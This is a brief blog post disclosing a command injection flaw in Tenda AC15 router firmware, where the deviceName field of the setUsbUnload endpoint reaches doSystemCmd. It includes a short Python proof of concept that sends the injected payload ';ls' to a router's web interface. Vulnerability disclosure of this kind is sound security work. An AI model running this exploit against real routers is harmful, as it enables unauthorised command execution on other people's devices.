Tenda AC15 has vulnerability

In Tenda AC15 V15.03.05.18 firmware, we discovered a command injection vulnerablility in the deviceName parameter and the Var varable is directly passed to a doSystemCmd function, causing an arbitrary command execution. The user-provided deviceName can trigger this security vulnerability.

import requests
from pwn import*

ip = "192.168.107.156"
url = "http://" + ip + "/goform/setUsbUnload"
payload = ";ls"

data = {"deviceName": payload}
response = requests.post(url, data=data)
print(response.text)

posted @ 2024-09-15 22:17 Amalll 阅读(32) 评论(0) 收藏举报

刷新页面返回顶部

Amalll

Tenda AC15 has vulnerability

公告